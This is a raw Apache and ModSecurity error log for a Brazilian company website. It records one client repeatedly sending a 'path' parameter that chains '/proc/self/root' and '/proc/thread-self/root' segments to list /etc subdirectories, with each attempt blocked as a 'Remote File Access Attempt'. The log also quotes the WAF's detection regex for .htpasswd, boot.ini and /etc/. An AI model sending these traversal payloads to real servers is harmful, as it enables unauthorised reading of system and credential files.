[Tue Mar 17 21:55:48.968589 2026] [:error] [pid 2598:tid 140411649607424] [client 74.7.241.31:50568] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4FBj0p0SRWAqcjGGmcQAAAws"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:55:59.122014 2026] [proxy_fcgi:error] [pid 31803:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45974] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:56:00.372301 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.241.31:50576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4IOw_le52K8_3pV15HwAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:03.963733 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:52182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4I8df6f5d65gmYZRrbQAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:05.712575 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:52194] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4Jcdf6f5d65gmYZRrcgAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:08.114218 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:35142] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4KAkwaGbbGflqUZCwSQAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:09.872184 2026] [:error] [pid 25836:tid 140411658000128] [client 74.7.241.31:35144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4KYh-PF_25v4hFRCXlgAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:11.382097 2026] [:error] [pid 18211:tid 140411590858496] [client 74.7.241.31:35150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4KxcIZFNFgEhGGCRDsQAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:12.919847 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.241.31:35166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4LOw_le52K8_3pV15IwAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:22.564663 2026] [proxy_fcgi:error] [pid 18211:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:46458] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:56:23.522251 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.241.31:44910] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4N8df6f5d65gmYZRrhgAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:26.504795 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:44920] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4Ouw_le52K8_3pV15LAAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:27.867306 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.241.31:36460] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4O-w_le52K8_3pV15MAAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:29.323879 2026] [:error] [pid 18211:tid 140411540502272] [client 74.7.241.31:36470] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4PRcIZFNFgEhGGCRDtgAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:31.335250 2026] [:error] [pid 25836:tid 140411540502272] [client 74.7.241.31:36474] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4P4h-PF_25v4hFRCXnAAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:32.853933 2026] [:error] [pid 2598:tid 140411741927168] [client 74.7.241.31:36484] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4QBj0p0SRWAqcjGGmjwAAAwA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:34.351222 2026] [:error] [pid 18211:tid 140411548894976] [client 74.7.241.31:36498] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4QhcIZFNFgEhGGCRDugAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:38.034374 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:44208] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4RtY0UrI5A3LftIwr8gAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:38.035389 2026] [mime_magic:error] [pid 19507:tid 140411666392832] (70014)End of file found: [client 74.7.241.31:44208] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:38.515855 2026] [:error] [pid 18211:tid 140411674785536] [client 74.7.241.31:44220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4RhcIZFNFgEhGGCRDvgAAA8g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:39.927356 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:44224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4R-yqAr6etmhZHNpToAAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:42.840359 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:44224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4SuyqAr6etmhZHNpTqAAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:44.722845 2026] [:error] [pid 25836:tid 140411616036608] [client 74.7.241.31:44226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4TIh-PF_25v4hFRCXqAAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:45.137799 2026] [proxy_fcgi:error] [pid 2598:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46912] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:56:46.257952 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:44230] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4Tta6ubjKNq_cu4YzFQAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:56:47.771615 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:41294] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn4T9a6ubjKNq_cu4YzGAAAA0A"], referer: 